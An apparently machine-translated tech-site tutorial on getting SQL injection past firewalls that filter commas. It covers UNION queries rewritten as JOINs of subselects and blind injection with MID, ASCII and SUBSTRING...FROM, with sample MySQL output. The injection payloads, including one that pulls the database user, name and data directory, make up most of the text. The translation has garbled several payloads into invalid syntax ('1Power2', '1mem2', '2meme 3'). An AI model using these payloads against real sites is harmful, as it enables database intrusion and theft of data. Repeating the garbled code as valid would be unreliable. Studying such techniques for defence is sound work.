Example Analysis of filtering comma Bypass in SQL injection techniques 01/18 Update SLTechnology News&Howtos

Example Analysis of filtering comma Bypass in SQL injection techniques

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Shulou(Shulou.com)05/31 Report--

Editor to share with you SQL injection skills in the obvious note and blind note filter comma bypass example analysis, I believe that most people do not know much, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

1. Joint query annotations bypass commas

In the joint query, we use the format of UNION SELECT 1, 2, 4, 4, 5, 5, 6 and 7.. n to burst the display bit, and the statement contains multiple commas. If WAF intercepts the comma, our joint query cannot be used.

Bypass

Replace with common injection variables or other statements on the display bit

Union select 1, join 2, join (select 2) B join (select group_concat (user (),'', database (),'', @ @ datadir)) C)

Demonstrate federated queries in the database

UNION starts with the statement we injected into URL. This is just a demonstration. In practice, if we have a comma in the injection statement, it may be intercepted.

Mysql > select user_id,user,password from users union select 1, 2, 3 +-- + | user_id | user | password | +-- + | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | +-- + 2 rows in set (0.04 sec) |

No comma, use Join to inject

Mysql > select user_id,user,password from users union select * from ((select 1) A join (select 2) B join (select 3) C) +-- + | user_id | user | password | +-- + | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | +-- + 2 rows in set (0.05sec) |

Query the data we want

two。 Blind comma bypass

The MID and substr functions are used to extract characters from text fields

Mysql > select mid (user (), 1Power2); +-+ | mid (user (), 1Power2) | +-+ | ro | +-+ 1 row in set (0.04 sec)

Query the ascii code of the first character of the database user name

Mysql > select user_id,user,password from users union select ascii (mid (user (), 1mem2)), 2meme 3 +-- + | user_id | user | password | +-- + | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 114 | 2 | 3 | +-- + 2 rows in set (0.05 sec) |

Blind note, by guessing ascii value

Comma bypasses SUBTTRING function

Substring (str FROM pos)

Returns a substring from the starting position of the string str pos

Inject

Mysql > select user_id,user,password from users where user_id=1 and (ascii (substring (user () from 2)) = 1140.The ascii of Empty set//substring (user () from 2) is 111meme MySQL > select user_id,user,password from users where user_id=1 and (substring (user () from 2)) +-- + | user_id | user | password | +-- + | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | +-+ 1 row in set (0.03 sec) above are all the contents of this article entitled "example Analysis of SQL injection skills in explicit comments and filtering comma Bypass in Blind Notes" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.